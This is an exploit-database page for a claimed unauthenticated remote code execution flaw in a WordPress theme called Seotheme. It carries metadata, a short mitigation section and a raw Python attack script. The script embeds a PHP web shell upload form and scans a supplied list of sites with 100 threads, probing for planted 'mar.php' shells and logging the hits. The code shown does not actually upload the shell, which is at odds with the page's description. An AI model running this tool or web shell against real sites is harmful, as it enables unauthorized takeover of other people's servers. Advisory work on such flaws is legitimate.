header-logo
Suggest Exploit
vendor:
Seotheme
by:
Milad Karimi (Ex3ptionaL)
6.1
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: Seotheme
Affected Version From: Not specified
Affected Version To: Not specified
Patch Exists: NO
Related CWE: Not provided
CPE: a:wordpress:seotheme
Metasploit:
Other Scripts:
Platforms Tested: Windows 10, Firefox
2023

WordPress Seotheme – Remote Code Execution Unauthenticated

The exploit allows remote attackers to execute arbitrary code on the target system without authentication. The vulnerability is due to improper input validation in the Wordpress Seotheme. The exploit code provided in the script allows attackers to upload a web shell and gain control over the target system.

Mitigation:

To mitigate this vulnerability, ensure the Wordpress Seotheme is updated to the latest version, apply proper input validation mechanisms, and restrict access to sensitive functionalities.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress Seotheme - Remote Code Execution Unauthenticated
# Date: 2023-09-20
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox

import sys , requests, re
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)

fr  =   Fore.RED
fc  =   Fore.CYAN
fw  =   Fore.WHITE
fg  =   Fore.GREEN
fm  =   Fore.MAGENTA

shell = """<?php echo "EX"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>"""
requests.urllib3.disable_warnings()
headers = {'Connection': 'keep-alive',
            'Cache-Control': 'max-age=0',
            'Upgrade-Insecure-Requests': '1',
            'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
            'referer': 'www.google.com'}
try:
    target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
except IndexError:
    path = str(sys.argv[0]).split('\\')
    exit('\n  [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')

def URLdomain(site):
    if site.startswith("http://") :
        site = site.replace("http://","")
    elif site.startswith("https://") :
        site = site.replace("https://","")
    else :
        pass
    pattern = re.compile('(.*)/')
    while re.findall(pattern,site):
        sitez = re.findall(pattern,site)
        site = sitez[0]
    return site


def FourHundredThree(url):
    try:
        url = 'http://' + URLdomain(url)
        check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,timeout=15)
        if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
                print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
        else:
            url = 'https://' + URLdomain(url)
            check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
            if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
                    print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                    open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
            else:
                print ' -| ' + url + ' --> {}[Failed]'.format(fr)
                url = 'http://' + URLdomain(url)
        check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,timeout=15)
        if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
                print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
        else:
            url = 'https://' + URLdomain(url)
            check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
            if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
                    print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                    open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
            else:
                print ' -| ' + url + ' --> {}[Failed]'.format(fr)
    except :
        print ' -| ' + url + ' --> {}[Failed]'.format(fr)

mp = Pool(100)
mp.map(FourHundredThree, target)
mp.close()
mp.join()

print '\n [!] {}Saved in Shells.txt'.format(fc)

Navigation

Suggest Exploit

Services By CQR